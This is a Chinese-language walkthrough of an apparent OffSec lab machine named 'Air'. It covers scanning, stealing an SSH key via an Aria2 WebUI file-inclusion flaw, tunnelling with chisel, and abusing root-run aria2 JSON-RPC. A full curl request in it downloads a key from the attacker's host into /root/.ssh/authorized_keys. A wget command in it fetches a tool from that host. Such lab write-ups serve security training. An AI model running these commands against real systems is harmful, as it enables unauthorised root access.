主要知识点
- 端口转发
具体步骤
nmap扫描第一步,线索不多,但很明确
Nmap scan report for 192.168.55.100
Host is up (0.00075s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
8888/tcp open sun-answerbook?
8888端口运行了一个Aria2 WebUI,还经常报错,搜索一下,得到了一个本地文件包含漏洞,
利用该漏洞可以拿到 deathflash/.ssh/目录下的key文件,并用来登录,也可以拿到第一个flag
C:\home\kali\Documents\OFFSEC\GoToWork\Air> ssh -i id_rsa deathflash@192.168.110.100
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-118-generic x86_64)
......
......
Last login: Sun Oct 20 13:10:43 2024 from 192.168.45.152
deathflash@air:~$ id
uid=1000(deathflash) gid=1000(deathflash) groups=1000(deathflash)
上传linpeas.sh后并执行
......
......
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
......
......
root 988 17.9 0.8 61704 16864 ? Ss 13:09 5:43 /usr/bin/aria2c --enable-rpc --rpc-listen-all=true --rpc-allow-origin-all=true --rpc-secret=**************
......
......
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6800 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8888 :::* LISTEN 1008/node
tcp6 0 0 :::6800 :::* LISTEN -
发现了root运行了aria2c,但是目前咱们没有 rpc-secret,同时发现 6800端口库被占用,但是在nmap枚举中没有发现,于是我们可以考虑用端口转发将remote server端的6800转发到local server,我们一步一步来做
在remote_server端执行如下命令,得到rpc-secret
deathflash@air:~$ find / -type f -name "aria*" 2>/dev/null
/etc/systemd/system/aria2.service
......
......
deathflash@air:~$ cat /etc/systemd/system/aria2.service
[Unit]
Description=Aria2c Download Manager
After=network.target
[Service]
ExecStart=/usr/bin/aria2c --enable-rpc --rpc-listen-all=true --rpc-allow-origin-all=true --rpc-secret=mEHNghqcNiF3KV
Restart=on-failure
User=root
Group=root
[Install]
WantedBy=multi-user.target
在本地运行chisel server
C:\home\kali\Documents\OFFSEC\GoToWork\Air> ./chisel server --reverse --port 9000
2024/10/20 09:10:15 server: Reverse tunnelling enabled
2024/10/20 09:10:15 server: Fingerprint C1bNBRXO8Jpi0ZA80jR8Y4ztA6wZVP0eXLvpvXM6fqk=
2024/10/20 09:10:15 server: Listening on http://0.0.0.0:9000
2024/10/20 09:12:55 server: session#1: tun: proxy#R:6800=>6800: Listening
在remote server端运行chisel client
C:\home\kali\Documents\OFFSEC\GoToWork\Air> ssh -i id_rsa deathflash@192.168.110.100
The authenticity of host '192.168.110.100 (192.168.110.100)' can't be established.
ED25519 key fingerprint is SHA256:EcFUQ3abooLm3ZmBChJ1yx8VqJ5nj/Htk22+PfBdxUo.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:41: [hashed name]
~/.ssh/known_hosts:61: [hashed name]
~/.ssh/known_hosts:62: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.110.100' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-118-generic x86_64)
......
......
deathflash@air:~$ wget 192.168.45.152/chisel
--2024-10-20 13:11:03-- http://192.168.45.152/chisel
Connecting to 192.168.45.152:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9371800 (8.9M) [application/octet-stream]
Saving to: ‘chisel’
chisel 100%[========================================================================================================================================>] 8.94M 326KB/s in 26s
2024-10-20 13:11:29 (358 KB/s) - ‘chisel’ saved [9371800/9371800]
deathflash@air:~$ chmod +x chisel
deathflash@air:~$ chisel client 192.168.45.152:9000 R:6800:127.0.0.1:6800
chisel: command not found
deathflash@air:~$ ls -l
total 9164
-rwxrwxr-x 1 deathflash deathflash 9371800 Oct 18 15:09 chisel
-r-------- 1 deathflash deathflash 33 Oct 20 13:09 local.txt
deathflash@air:~$ ./chisel client 192.168.45.152:9000 R:6800:127.0.0.1:6800
2024/10/20 13:12:44 client: Connecting to ws://192.168.45.152:9000
2024/10/20 13:12:50 client: Connected (Latency 1.26550807s)
对本地server进行nmap扫描会得到我们挂载了remote server端的6800端口
PORT STATE SERVICE VERSION
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
|_http-cors: GET POST OPTIONS
......
......
在UI中进行更改Connection Setting,将jsonrpc路径指向本地6800端口
搜索aria jsonrpc download file,可以得到例子
,修改一下里面的内容可以通过curl从local server下载文件并保存到remote server,由于aria2 在remote server端是由root启动的,所以理论上可以覆盖任意文件
在remote server端执行如下curl命令,id_rsa.pub可以直接复用从deathflash用户的.ssh目录下辅助出来的(这里需要注意,如果本地在openvpn文件中配置了代理,要把代理注释掉重新连接VPN,否则无法下载)
curl --location 'http://localhost:6800/jsonrpc' \
--header 'Content-Type: application/json' \
--data '{
"jsonrcp": "2.0",
"id": "root",
"method": "aria2.addUri",
"params": [
"token:mEHNghqcNiF3KV",
[
"http://192.168.45.152/id_rsa.pub"
],
{
"out": "/root/.ssh/authorized_keys"
}
]
}'
稍等一下,利用deathflash用户的id_rsa作为凭据登录root,成功
C:\home\kali\Documents\OFFSEC\GoToWork\Air> ssh -i id_rsa root@192.168.110.100
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-118-generic x86_64)
......
......
Last login: Tue Aug 27 16:23:42 2024
root@air:~# cat /root/proof.txt
5657ab9b4f910de09190cd605a6b5349
root@air:~# cat /root/proof.txt
扫一扫
945
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
